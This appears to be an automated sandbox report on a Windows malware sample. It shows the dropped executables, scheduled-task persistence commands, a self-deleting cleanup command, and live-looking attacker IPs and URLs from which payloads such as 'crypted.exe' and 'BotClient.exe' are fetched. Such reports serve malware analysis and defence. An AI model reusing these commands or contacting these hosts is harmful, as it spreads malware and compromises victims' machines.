Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 20, 2024, 8:10 p.m. | July 20, 2024, 8:29 p.m. |
-
-
d_RIPuBmnjojf5JMU6a5QhMe.exe C:\Users\test22\Documents\SimpleAdobe\d_RIPuBmnjojf5JMU6a5QhMe.exe
1264 -
nHLIm6xHX7c236uOGqXkdPJG.exe C:\Users\test22\Documents\SimpleAdobe\nHLIm6xHX7c236uOGqXkdPJG.exe
148 -
D_Lr3ok7w7oLDH8Q70lFMUK9.exe C:\Users\test22\Documents\SimpleAdobe\D_Lr3ok7w7oLDH8Q70lFMUK9.exe
2212-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
2860 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
3060
-
-
y0Q2LMuickieMvG8m310BTdg.exe C:\Users\test22\Documents\SimpleAdobe\y0Q2LMuickieMvG8m310BTdg.exe
2196 -
EN4TCgpUszKEwT9miRPGOajK.exe C:\Users\test22\Documents\SimpleAdobe\EN4TCgpUszKEwT9miRPGOajK.exe
2164 -
FjsNdi4kjdtz2qw1MphlaqEs.exe C:\Users\test22\Documents\SimpleAdobe\FjsNdi4kjdtz2qw1MphlaqEs.exe
2224 -
rYWTjDsqXT4AcDkoeJs_yZP2.exe C:\Users\test22\Documents\SimpleAdobe\rYWTjDsqXT4AcDkoeJs_yZP2.exe
2276 -
7CF2bZR8HWtuPTUKAqzCc3OT.exe C:\Users\test22\Documents\SimpleAdobe\7CF2bZR8HWtuPTUKAqzCc3OT.exe
2368-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit
2088-
timeout.exe timeout /t 10
1088
-
-
-
-
_pE7OUzePdg8dQq0bonZyFkX.exe C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe
2320-
_pE7OUzePdg8dQq0bonZyFkX.tmp "C:\Users\test22\AppData\Local\Temp\is-L49PN.tmp\_pE7OUzePdg8dQq0bonZyFkX.tmp" /SL5="$60138,5820132,54272,C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe"
1812-
soundchangerbeta32.exe "C:\Users\test22\AppData\Local\Sound Changer Beta\soundchangerbeta32.exe" -i
2896 -
soundchangerbeta32.exe "C:\Users\test22\AppData\Local\Sound Changer Beta\soundchangerbeta32.exe" -s
2456
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
IP Address | Status | Action |
---|---|---|
104.21.66.124 | Active | Moloch |
104.237.62.213 | Active | Moloch |
104.26.4.15 | Active | Moloch |
121.254.136.9 | Active | Moloch |
131.153.76.130 | Active | Moloch |
149.154.167.99 | Active | Moloch |
162.159.130.233 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.132.113 | Active | Moloch |
172.67.75.163 | Active | Moloch |
176.111.174.109 | Active | Moloch |
34.117.59.81 | Active | Moloch |
77.105.133.27 | Active | Moloch |
78.46.255.249 | Active | Moloch |
79.137.192.13 | Active | Moloch |
89.111.172.64 | Active | Moloch |
91.103.252.177 | Active | Moloch |
94.232.45.38 | Active | Moloch |
96.7.99.225 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49164 172.67.75.163:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=myip.com | 87:d2:90:92:b6:6a:56:3c:25:f1:ae:56:52:d9:2b:ac:16:44:bb:bc |
TLSv1 192.168.56.101:49170 104.26.4.15:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=db-ip.com | 61:a1:85:30:8f:04:68:e2:7b:34:d7:83:41:95:57:f4:94:c0:17:c3 |
TLSv1 192.168.56.101:49192 104.21.66.124:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=foxesjoy.com | 7c:98:d5:06:20:bf:d9:af:30:ac:9a:78:12:fe:95:20:93:e7:d1:f0 |
TLSv1 192.168.56.101:49218 96.7.99.225:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | 10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5 |
TLS 1.3 192.168.56.101:49226 131.153.76.130:443 |
None | None | None |
TLSv1 192.168.56.101:49199 172.67.132.113:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=iplogger.org | 08:dd:39:df:d9:24:0d:d7:6f:12:c0:8e:bc:78:4a:76:c1:28:90:07 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | _RDATA |
section | .vmpVF}A |
suspicious_features | Connection to IP address | suspicious_request | GET http://91.103.252.177/api/crazyfish.php | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://91.103.252.177/api/twofish.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://79.137.192.13/prog/669a659129ee2_crypted.exe#1 | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://77.105.133.27/download/th/space.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://77.105.133.27/download/123p.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://176.111.174.109/psyzh | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://94.232.45.38/eee01/eee01.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://89.111.172.64/d/385132 | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://79.137.192.13/prog/6692518842cd4_BotClient.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://79.137.192.13/prog/669a659129ee2_crypted.exe#1 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://77.105.133.27/download/th/space.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://77.105.133.27/download/123p.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://94.232.45.38/eee01/eee01.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://176.111.174.109/psyzh | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://89.111.172.64/d/385132 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://79.137.192.13/prog/6692518842cd4_BotClient.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://steamcommunity.com/profiles/76561199743486170 |
request | GET http://91.103.252.177/api/crazyfish.php |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | POST http://91.103.252.177/api/twofish.php |
request | HEAD http://79.137.192.13/prog/669a659129ee2_crypted.exe#1 |
request | HEAD http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene |
request | HEAD http://77.105.133.27/download/th/space.php |
request | HEAD http://77.105.133.27/download/123p.exe |
request | HEAD http://176.111.174.109/psyzh |
request | HEAD http://94.232.45.38/eee01/eee01.exe |
request | HEAD http://89.111.172.64/d/385132 |
request | HEAD http://79.137.192.13/prog/6692518842cd4_BotClient.exe |
request | HEAD http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin |
request | GET http://79.137.192.13/prog/669a659129ee2_crypted.exe#1 |
request | GET http://79.137.192.13/prog/669b5b78252ea_googlesoft.exe#mene |
request | GET http://77.105.133.27/download/th/space.php |
request | GET http://77.105.133.27/download/123p.exe |
request | GET http://94.232.45.38/eee01/eee01.exe |
request | GET http://176.111.174.109/psyzh |
request | GET http://89.111.172.64/d/385132 |
request | GET http://79.137.192.13/prog/6692518842cd4_BotClient.exe |
request | GET http://79.137.192.13/prog/6696621cecc83_crypted.exe#xin |
request | GET https://db-ip.com/demo/home.php?s= |
request | GET https://iplogger.org/1nhuM4.js |
request | GET https://steamcommunity.com/profiles/76561199743486170 |
request | POST http://91.103.252.177/api/twofish.php |
description | AppGate018ver1.exe tried to sleep 266 seconds, actually delayed analysis time by 266 seconds |